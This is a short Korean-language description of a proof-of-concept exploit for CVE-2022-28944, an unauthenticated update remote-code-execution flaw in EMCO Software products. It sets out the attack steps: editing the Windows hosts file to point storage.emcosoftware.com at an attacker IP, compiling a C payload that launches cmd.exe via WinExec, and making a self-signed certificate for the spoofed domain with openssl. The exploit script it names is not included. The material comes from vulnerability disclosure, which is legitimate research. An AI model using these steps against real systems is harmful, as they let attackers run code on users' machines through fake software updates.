
EMCO Software 제품에서 DNS 스푸핑 및 악의적인 업데이트 주입을 통한 인증되지 않은 원격 코드 실행을 위한 개념 증명 익스플로잇.
EMCO Software 여러 제품의 인증되지 않은 업데이트 원격 코드 실행 취약점.
사용법: python3 cve-2022-28944_poc.py
자세한 내용은 gerr.re 보고서를 참조하세요.
storage.emcosoftware.com을 공격자 IP로 스푸핑하도록 설정합니다.
c:\windows\system32\drivers\etc\hosts를 수정합니다.
proof.c를 컴파일합니다(예: i686-w64-mingw32-gcc proof.c -o proof.exe 사용).#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com" 사용